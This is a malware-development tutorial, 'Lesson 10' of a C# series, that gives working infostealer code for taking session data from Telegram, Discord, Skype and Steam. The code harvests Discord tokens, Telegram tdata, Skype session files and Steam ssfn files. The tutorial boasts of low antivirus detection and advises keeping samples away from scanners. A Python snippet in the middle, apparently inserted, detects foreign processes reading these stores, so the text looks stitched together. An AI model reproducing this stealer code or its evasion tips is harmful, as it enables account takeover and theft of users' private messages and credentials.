Lesson 10: Stealing Accounts Sessions with Malware
👾 Malware Development Series by XIT (C#)
Below is the Topics List for Lesson 10:
10. Accounts Session:
⇢ Telegram
⇢ Discord
⇢ Skype
⇢ Steam
more…
Accessing user accounts and sessions is a valuable goal for attackers seeking to steal sensitive data. In this lesson, we’ll demonstrate how to add functionality that can steal account sessions from popular services such as Telegram, Discord, Skype, Steam, and more.
Topic 1: Telegram Session
Telegram is a popular messaging app with more than 500 million active users. Using the below source-code you can write a function that is capable of stealing Telegram session data, giving you access to sensitive user data such as messages and contacts.
// telegram
private static string[] TelegramDirectories = new string[] {
"Telegram Desktop\\tdata\\D877F783D5D3EF8C",
"Telegram Desktop\\tdata\\D877F783D5D3EF8C\\map"
};
foreach (string directory in TelegramDirectories)
{
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), directory);
if (Directory.Exists(path))
{
foreach (string file in Directory.GetFiles(path))
{
if (Path.GetFileName(file) == "user.dat")
{
byte[] bytes = File.ReadAllBytes(file);
string content = Encoding.UTF8.GetString(bytes);
MatchCollection matches = Regex.Matches(content, @"(?:\W|^)(api_id|api_hash|app_version|device_model|system_version)\\":\\s\\"([^\\]+)");
if (matches.Count > 0)
{
string output = "";
foreach (Match match in matches)
{
output += match.Groups[1].Value + ": " + match.Groups[2].Value + "\n";
}
File.WriteAllText(sSavePath + "\\TelegramInfo.txt", output);
break;
}
}
}
}
}
// also add here function to copy the session directory
Topic 2: Discord Session
Discord is a popular communication app used by millions of gamers and other communities. Using the below source-code you can write a function that is capable of stealing Discord session data, allowing you to access sensitive user data such as messages, servers, and channels.
// discord
private static Regex TokenRegex = new Regex(@"[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}");
private static string[] DiscordDirectories = new string[] {
"Discord\\Local Storage\\leveldb",
"Discord PTB\\Local Storage\\leveldb",
"Discord Canary\\Local Storage\\leveldb",
"Discord Development\\Local Storage\\leveldb",
};
public static void FetchDiscordTokens()
{
List<string> tokens = new List<string>();
foreach (string directory in DiscordDirectories)
{
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), directory);
if (Directory.Exists(path))
{
foreach (string file in Directory.GetFiles(path, "*.ldb"))
{
try
{
string contents = File.ReadAllText(file);
foreach (Match match in TokenRegex.Matches(contents))
{
if (!tokens.Contains(match.Value))
{
tokens.Add(match.Value);
}
}
}
catch (Exception ex)
{
Console.WriteLine($"Error reading Discord token from file {file}: {ex.Message}");
}
}
}
}
if (tokens.Count > 0)
{
try
{
string filePath = Path.Combine(Environment.CurrentDirectory, "discord_tokens.txt");
File.WriteAllLines(filePath, tokens);
Console.WriteLine($"Discord tokens written to {filePath}");
}
catch (Exception ex)
{
Console.WriteLine($"Error writing Discord tokens file: {ex.Message}");
}
}
else
{
Console.WriteLine("No Discord tokens found.");
}
try
{
foreach (string directory in DiscordDirectories)
{
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), directory);
if (Directory.Exists(path))
{
string destPath = Path.Combine(Environment.CurrentDirectory, directory.Replace('\\', '_') + ".zip");
Console.WriteLine($"Copied Discord session files to {destPath}");
}
}
}
catch (Exception ex)
{
Console.WriteLine($"Error copying Discord session files: {ex.Message}");
}
}
Topic 3: Skype Session
Skype is a popular video and messaging app used by millions of people around the world. Using the below source-code you can write a function that is capable of stealing Skype session data, giving you access to sensitive user data such as messages, contacts, and call logs.
// skype
var skypeKey = Registry.CurrentUser.OpenSubKey("Software\\Skype\\Phone");
if (skypeKey == null)
return false;
var skypePath = skypeKey.GetValue("SkypePath")?.ToString();
if (!Directory.Exists(skypePath))
return false;
var sessionPath = Path.Combine(skypePath, "Sessions");
if (!Directory.Exists(sessionPath))
return false;
foreach (var file in Directory.GetFiles(sessionPath, "*.dbb"))
{
var fileName = Path.GetFileName(file);
var destinationPath = Path.Combine(Directory.GetCurrentDirectory(), fileName);
File.Copy(file, destinationPath, true);
}
File.WriteAllText("skype.txt", $"Skype installation path: {skypePath}");
return true;
Topic 4: Steam Session
Steam is a popular gaming platform with more than 120 million active users. Using the below source-code you can write a function that is capable of stealing Steam session data, allowing you to access sensitive user data such as game libraries and payment information.
// steam
var steamKey = Registry.CurrentUser.OpenSubKey("Software\\Valve\\Steam");
if (steamKey == null)
return false;
var steamPath = steamKey.GetValue("SteamPath")?.ToString();
if (!Directory.Exists(steamPath))
return false;
var steamInfo = new StringBuilder();
foreach (var gameID in steamKey.OpenSubKey("Apps").GetSubKeyNames())
{
using (var appKey = steamKey.OpenSubKey($"Apps\\{gameID}"))
{
var name = appKey.GetValue("Name") as string ?? "Unknown";
var installed = (int)(appKey.GetValue("Installed") ?? 0) == 1 ? "Yes" : "No";
var running = (int)(appKey.GetValue("Running") ?? 0) == 1 ? "Yes" : "No";
var updating = (int)(appKey.GetValue("Updating") ?? 0) == 1 ? "Yes" : "No";
steamInfo.AppendLine($"Application {name}\n\tGameID: {gameID}\n\tInstalled: {installed}\n\tRunning: {running}\n\tUpdating: {updating}\n");
}
}
foreach (var file in Directory.GetFiles(steamPath ?? string.Empty))
{
if (Path.GetFileName(file)?.Contains("ssfn") == true)
File.Copy(file, $".\\{Path.GetFileName(file)}");
}
var rememberPassword = (int)(steamKey.GetValue("RememberPassword") ?? 0) == 1 ? "Yes" : "No";
steamInfo.AppendLine($"\nAutologin User: {steamKey.GetValue("AutoLoginUser")}\nRemember password: {rememberPassword}");
File.WriteAllText("steam.txt", steamInfo.ToString());
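From the defender's side, the four routines above share one observable: a process other than the owning client reads that client's session store. The sketch below is an added example, not part of the original lesson or the author's code, that triages file-access telemetry on that basis; the event field names, the sample events and the allow-listed executable names are assumptions.

```python
import re
from collections import defaultdict

# Session stores named in this lesson -> executables expected to read them.
# The executable names are assumptions; tune them to your own fleet.
STORES = {
    "telegram": (r"\\telegram desktop\\tdata\\", {"telegram.exe"}),
    "discord": (r"\\discord[^\\]*\\local storage\\leveldb\\",
                {"discord.exe", "discordptb.exe", "discordcanary.exe",
                 "discorddevelopment.exe"}),
    "skype": (r"\\sessions\\[^\\]+\.dbb$", {"skype.exe"}),
    "steam": (r"\\ssfn[^\\]*$", {"steam.exe"}),
}

def classify(target):
    """Return the name of the store a file path belongs to, or None."""
    for store, (pattern, _owners) in STORES.items():
        if re.search(pattern, target, re.I):
            return store

def find_foreign_readers(events):
    """Map image path -> stores it touched without being their owner."""
    hits = defaultdict(set)
    for ev in events:
        store = classify(ev["target"])
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if store and exe not in STORES[store][1]:
            hits[ev["image"]].add(store)
    return dict(hits)

def triage(events):
    """One foreign store is suspicious; two or more fits a session stealer."""
    return {image: ("high" if len(stores) > 1 else "medium", sorted(stores))
            for image, stores in find_foreign_readers(events).items()}

# Constructed sample events; "image" and "target" are hypothetical field names.
ROAMING = r"C:\Users\a\AppData\Roaming"
SAMPLE = [
    {"image": r"C:\Users\a\AppData\Local\Discord\app\Discord.exe",
     "target": ROAMING + r"\discord\Local Storage\leveldb\000005.ldb"},
    {"image": r"C:\Users\a\Downloads\setup.exe",
     "target": ROAMING + r"\discord\Local Storage\leveldb\000005.ldb"},
    {"image": r"C:\Users\a\Downloads\setup.exe",
     "target": ROAMING + r"\Telegram Desktop\tdata\D877F783D5D3EF8C\map"},
    {"image": r"C:\Tools\backup.exe", "target": r"D:\Steam\ssfn0000"},
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Matching on the executable name alone is a first-pass filter; in production, pair it with signer or image-path checks, since a file name is trivially chosen by whoever wrote the binary.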
Topic 5: More Account Sessions
Beyond Telegram, Discord, Skype, and Steam, there are many other popular services with valuable account sessions. Referring to the logic above, you can write custom functions that steal session data from those other popular services, giving you access to even more sensitive user data.
Finally, I compiled all the topics of lesson 10 & it was detected by 2 out of 26 antivirus scans.
Remember: Don’t share your unencrypted assemblies or malware source with random antivirus scanners; use only those which are listed in the article given below to keep your malware undetected forever:
Conclusion
For attackers looking to acquire sensitive user data, stealing account sessions is a useful aim. In this class, we learned how to create malware that can steal sessions from major sites like Telegram, Discord, Skype, Steam, and others. With this information, you may create more powerful malware programmes and keep up with the most recent cybersecurity threats. Stay tuned for our next class, in which we’ll look at how to make your malware more advanced by adding file grabbing features.